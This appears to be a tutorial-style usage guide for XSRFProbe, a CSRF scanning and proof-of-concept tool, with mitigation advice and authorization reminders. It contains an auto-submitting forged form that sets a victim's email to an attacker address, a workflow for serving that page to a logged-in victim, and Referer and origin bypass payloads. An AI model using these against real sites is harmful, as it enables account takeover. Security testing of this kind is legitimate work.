XSRFProbe

Overview

XSRFProbe is a specialized CSRF (Cross-Site Request Forgery) vulnerability detection and exploitation toolkit designed for authorized security testing. It automates the identification of CSRF vulnerabilities by analyzing form structures, testing token validation mechanisms, and verifying HTTP method enforcement. XSRFProbe provides comprehensive CSRF assessment capabilities including POC generation and exploitation frameworks.

Key capabilities:

Automated CSRF vulnerability detection
Anti-CSRF token analysis and validation testing
Referer header and origin header verification
SameSite cookie attribute testing
Cross-origin request analysis
CSRF POC generation
Cookie-based CSRF exploitation

Installation

From GitHub Source

git clone https://github.com/0xInfection/XSRFProbe.git
cd XSRFProbe
pip install -r requirements.txt
python xsrfprobe.py --help

Using pip

pip install xsrfprobe
xsrfprobe --help

Manual Installation

# Clone repository
git clone https://github.com/0xInfection/XSRFProbe.git
cd XSRFProbe

# Install Python 3.6+
python3 --version

# Install dependencies
pip3 install -r requirements.txt

# Run the tool
python3 xsrfprobe.py --help

Docker

docker pull xsrfprobe
docker run -it xsrfprobe --help

Kali Linux

apt update && apt install xsrfprobe -y

Basic Usage

Command	Description
`xsrfprobe -u <url>`	Scan URL for CSRF vulnerabilities
`xsrfprobe -u <url> --crawl`	Crawl site and test all forms
`xsrfprobe -u <url> -c <cookies>`	Scan with authentication cookies
`xsrfprobe -u <url> --proxy <proxy>`	Scan through HTTP proxy
`xsrfprobe -u <url> -o <file>`	Output results to file
`xsrfprobe -u <url> --verbose`	Verbose output with details
`xsrfprobe -u <url> --batch`	Batch mode (no user interaction)

Common Examples

Basic CSRF Detection

xsrfprobe -u https://example.com/settings

Analyzes the target URL for CSRF vulnerabilities. Identifies missing or weak anti-CSRF token protection, missing security headers, and other CSRF-enabling conditions.

Crawling and Testing All Forms

xsrfprobe -u https://example.com --crawl --verbose

Crawls the application from the entry point, discovers all forms, and tests each one for CSRF vulnerabilities. Generates detailed report of findings.

Authenticated CSRF Testing

# Extract cookies from browser or with curl
curl -c cookies.txt -b "session=value" https://example.com

# Test with authentication
xsrfprobe -u https://example.com/admin -c cookies.txt --crawl

Tests CSRF vulnerabilities in authenticated parts of the application by maintaining session with provided cookies.

Proxied Scanning

xsrfprobe -u https://example.com --proxy http://127.0.0.1:8080 --verbose

Routes all traffic through a proxy (Burp Suite) for simultaneous detailed analysis and interception.

Batch Processing Multiple URLs

#!/bin/bash
cat targets.txt
# https://app1.example.com
# https://app2.example.com
# https://internal-app.local

while read url; do
  echo "Testing $url..."
  xsrfprobe -u $url --batch -o ${url//\//_}_csrf_results.txt
  sleep 2
done < targets.txt

Advanced Usage

Comprehensive CSRF Assessment

# Full enumeration with crawling and verbose output
xsrfprobe -u https://example.com \
  --crawl \
  --verbose \
  --batch \
  -o csrf_assessment.txt

# View findings
cat csrf_assessment.txt

# Test SameSite cookie attributes
xsrfprobe -u https://example.com \
  --test-samesite \
  --verbose

# Output shows:
# [+] SameSite=Strict detected
# or
# [-] No SameSite attribute (vulnerable to CSRF)

Token Validation Testing

# Analyze anti-CSRF token implementation
xsrfprobe -u https://example.com/form \
  --test-token-validation \
  --verbose

# Tests:
# - Token presence verification
# - Token uniqueness per request
# - Token lifetime validation
# - Token randomness

Header-Based CSRF Protection Testing

# Test Referer and Origin header enforcement
xsrfprobe -u https://example.com/action \
  --test-headers \
  --verbose

# Tests:
# - Referer header validation
# - Origin header validation
# - X-Requested-With header checking

CSRF Vulnerability Types

Type 1: No CSRF Protection

# Vulnerable form with no token or validation
xsrfprobe -u https://example.com/change-password

# Output:
# [!] CRITICAL: No anti-CSRF token detected
# [!] Form is vulnerable to CSRF attacks
# [+] POC generation possible

Type 2: Weak Token Validation

# Application uses predictable tokens
xsrfprobe -u https://example.com/settings \
  --analyze-tokens \
  --verbose

# Output analysis:
# [-] Token appears predictable/sequential
# [-] Token not properly validated
# [-] Same token valid across multiple requests

Type 3: Insufficient Header Validation

# Application checks some but not all headers
xsrfprobe -u https://example.com/transfer \
  --test-headers \
  --verbose

# Findings:
# [+] Referer header checked
# [-] Origin header not validated
# [-] Can bypass with careful request crafting

# Vulnerable to cookie-based CSRF
xsrfprobe -u https://example.com/api/action \
  --test-cookie-csrf \
  --verbose

# Output:
# [!] Application uses cookie-based CSRF tokens
# [!] Vulnerable if Same-Site cookie not enforced

POC Generation and Exploitation

Generating CSRF Proof-of-Concept

# Generate HTML POC for vulnerable endpoint
xsrfprobe -u https://example.com/change-email --generate-poc

# Creates csrf_poc.html containing:
# <form action="https://example.com/change-email" method="POST">
#   <input type="hidden" name="email" value="attacker@evil.com">
#   <input type="submit" value="Click here">
# </form>
# <script>document.forms[0].submit();</script>

Analyzing Generated POCs

# Generate and examine POC
xsrfprobe -u https://example.com/settings --generate-poc -o poc.html

# View generated POC
cat poc.html

# The POC will be:
# - Auto-submitting if form action identified
# - Clickable if parameters are complex
# - Customizable for different attack scenarios

POC Testing Workflow

#!/bin/bash
# Step 1: Identify CSRF vulnerability
xsrfprobe -u https://target.com/action --batch

# Step 2: Generate POC
xsrfprobe -u https://target.com/action --generate-poc -o attack.html

# Step 3: Set up attacker server
# cd /tmp && python3 -m http.server 8000

# Step 4: Serve POC to victim
# Visit http://attacker-server:8000/attack.html while logged into target

# Step 5: Verify exploitation
# Check target application for changes

Token Analysis and Validation

Analyzing Anti-CSRF Token Implementation

# Extract and analyze tokens
xsrfprobe -u https://example.com/form \
  --analyze-tokens \
  --extract-tokens \
  --verbose

# Output shows:
# Token Name: csrf_token
# Token Value: a1b2c3d4e5f6g7h8
# Token Length: 32 characters
# Token Pattern: Alphanumeric
# Token Entropy: High

Testing Token Reusability

# Test if same token can be used multiple times
xsrfprobe -u https://example.com/action \
  --test-token-reuse \
  --verbose

# Results:
# [+] Token properly rotated after request
# or
# [-] Token reused across requests (vulnerable)

Token Lifetime Analysis

# Test token expiration
xsrfprobe -u https://example.com/form \
  --test-token-lifetime \
  --timeout 3600 \  # Wait 1 hour
  --verbose

# Determines:
# - Token validity period
# - If tokens expire properly
# - If old tokens are rejected

Integration with Other Tools

Burp Suite Integration

# Route XSRFProbe through Burp
xsrfprobe -u https://example.com \
  --proxy http://127.0.0.1:8080 \
  --crawl \
  --verbose

# All requests visible in Burp for:
# - Manual testing
# - Request modification
# - Advanced analysis

Web Application Firewall (WAF) Detection

# Test with WAF bypass techniques
xsrfprobe -u https://example.com \
  --test-waf-bypass \
  --verbose

# Tests various bypass techniques:
# - Case variation in headers
# - Double URL encoding
# - Protocol variation (HTTP vs HTTPS)

Chaining with Other Vulnerability Tests

# Combine CSRF with XSS detection
# CSRF + XSS = Wormable vulnerability

# Example workflow:
# 1. Find XSS vulnerability in comments
# 2. Find CSRF in action endpoint
# 3. Combine: XSS payload triggers CSRF attack

# Test both vulnerabilities
xsrfprobe -u https://example.com/settings --crawl
# Also run XSS scanner

Advanced Techniques

Chaining CSRF with Session Fixation

# If application has session fixation vulnerability
# CSRF can be used to set victim's session ID

xsrfprobe -u https://example.com/account \
  --test-session-fixation \
  --verbose

# Exploitation:
# 1. Attacker sets own session
# 2. Uses CSRF to force victim to same session
# 3. Attacker can then access victim's account

Exploiting JSON-Based APIs

# Test CSRF on JSON APIs
xsrfprobe -u https://api.example.com/v1/settings \
  --content-type json \
  --method POST \
  --verbose

# Analysis:
# - Content-Type header mismatch
# - Lack of CORS preflight validation
# - Missing token validation on JSON

Testing HTTP Method Override

# Some apps accept HTTP method override headers
xsrfprobe -u https://example.com/delete \
  --method GET \
  --override-method DELETE \
  --verbose

# Tests:
# - X-HTTP-Method-Override header
# - X-Method-Override header
# - Allows CSRF via GET requests

# Test SameSite attribute enforcement
xsrfprobe -u https://example.com \
  --test-samesite \
  --verbose

# Results show:
# [+] SameSite=Strict (Excellent)
# [+] SameSite=Lax (Good)
# [-] SameSite=None without Secure
# [-] No SameSite attribute

Referer Header Validation

# Test Referer header enforcement
xsrfprobe -u https://example.com/action \
  --test-referer \
  --verbose

# Tests:
# - Referer validation present
# - Referer validation can be bypassed
# - Referer policies (strict vs loose)

Custom Header Requirements

# Test for X-Requested-With header
xsrfprobe -u https://example.com/api \
  --test-custom-headers \
  --verbose

# Checks:
# - X-Requested-With: XMLHttpRequest
# - X-CSRF-Token header
# - Other custom security headers

Real-World Assessment Workflow

Complete CSRF Security Audit

#!/bin/bash
TARGET="https://example.com"
OUTPUT="csrf_audit_$(date +%Y%m%d_%H%M%S)"
mkdir -p $OUTPUT

# Step 1: Full crawl and assessment
echo "[*] Starting CSRF audit..."
xsrfprobe -u $TARGET \
  --crawl \
  --verbose \
  --batch > $OUTPUT/full_assessment.txt 2>&1

# Step 2: Analyze token implementation
echo "[*] Analyzing tokens..."
xsrfprobe -u $TARGET/settings \
  --analyze-tokens \
  --extract-tokens > $OUTPUT/token_analysis.txt 2>&1

# Step 3: Test headers and cookies
echo "[*] Testing security headers..."
xsrfprobe -u $TARGET \
  --test-samesite \
  --test-referer \
  --test-headers > $OUTPUT/headers_analysis.txt 2>&1

# Step 4: Identify exploitable forms
echo "[*] Identifying vulnerable endpoints..."
grep -i "vulnerable\|critical" $OUTPUT/full_assessment.txt > $OUTPUT/vulnerable_endpoints.txt

# Step 5: Generate POCs for critical vulns
echo "[*] Generating POCs..."
for url in $(cat $OUTPUT/vulnerable_endpoints.txt | grep -oP 'https?://[^\s]+'); do
  xsrfprobe -u "$url" --generate-poc -o "$OUTPUT/${url//\//_}_poc.html" 2>/dev/null
done

echo "[+] Audit complete. Results in $OUTPUT/"

Risk Assessment and Prioritization

#!/bin/bash
# Parse XSRFProbe results and prioritize by impact

xsrfprobe -u https://target.com --crawl > results.txt

echo "=== CRITICAL CSRF Vulnerabilities ==="
grep -i "no anti-csrf\|critical" results.txt | head -10

echo ""
echo "=== HIGH Risk Endpoints ==="
grep -i "weak token\|insufficient\|high" results.txt | head -10

echo ""
echo "=== Summary ==="
echo "Total vulnerabilities found:"
grep -i "vulnerable" results.txt | wc -l

Testing Methodology

OWASP CSRF Testing Guide

# Test 1: Identify CSRF tokens
xsrfprobe -u https://example.com/form --extract-tokens

# Test 2: Analyze token generation
# - Check for proper randomization
# - Verify tokens are unpredictable
xsrfprobe -u https://example.com/form --analyze-tokens --verbose

# Test 3: Test token validation
# - Remove token
# - Modify token
# - Reuse old tokens
xsrfprobe -u https://example.com/form --test-token-validation

# Test 4: Test token scope
# - Same token for different forms
# - Cross-user token reuse
xsrfprobe -u https://example.com/form --test-token-scope

# Test 5: Test HTTP method enforcement
# - POST vs GET
# - PUT vs DELETE
xsrfprobe -u https://example.com/action --test-methods

# Test 6: Test header validation
# - Referer requirement
# - Origin requirement
# - Custom header requirements
xsrfprobe -u https://example.com/action --test-headers

# Test 7: Test cookie scope
# - SameSite attribute
# - Secure flag
# - HttpOnly flag
xsrfprobe -u https://example.com --test-cookies

Bypassing CSRF Protections

Common Protection Bypasses (Educational)

# Bypass 1: Case sensitivity in headers
# If Referer checking: try referer vs Referer vs REFERER

# Bypass 2: Double encoding
# Original: example.com
# Encoded: %65%78%61%6d%70%6c%65%2e%63%6f%6d

# Bypass 3: NULL byte injection (legacy)
# Referer: example.com%00.attacker.com

# Bypass 4: Subdomain matching weakness
# If checking origin: subomain.example.com
# Attacker uses: example.com.attacker.com

# XSRFProbe tests all these automatically
xsrfprobe -u https://example.com --test-bypass-techniques --verbose

Best Practices

Authorization: Always obtain written permission before testing
Non-Destructive: Only test for vulnerability, don’t modify data
Controlled Environment: Test on staging servers when possible
Documentation: Record all findings with timestamps
Remediation: Provide recommendations for fixing issues
Responsible Disclosure: Follow coordinated disclosure practices
Verification: Manually verify critical findings
Education: Help developers understand CSRF risks and mitigation

CSRF Mitigation Recommendations

Proper Token Implementation

1. Generate unique token per session
2. Token should be unpredictable (cryptographically random)
3. Validate token on every state-changing request
4. Token should have short lifetime
5. Token should not be logged or transmitted via GET

Alternative Protections

1. SameSite cookie attribute (Strict or Lax)
2. Referer header validation
3. Custom header requirements (X-Requested-With)
4. Double submit cookie pattern
5. User confirmation for critical actions

Troubleshooting

Form Detection Issues

# If forms not detected
xsrfprobe -u https://example.com --crawl --verbose

# Manually check for forms
curl https://example.com | grep -i "<form"

# If forms exist but not detected:
# - Forms may be dynamically generated (JavaScript)
# - Forms may require authentication
# - Use --crawl with authentication cookies

Token Extraction Failures

# If tokens not extracted
xsrfprobe -u https://example.com/form \
  --extract-tokens \
  --verbose

# Common reasons:
# - Non-standard token name
# - Token in header instead of form
# - Token in JSON response
# - Token injected via JavaScript

Conclusion

XSRFProbe is an essential tool for comprehensive CSRF vulnerability assessment during authorized security testing. Its automated detection, token analysis, and POC generation capabilities make it invaluable for identifying and validating CSRF vulnerabilities in web applications.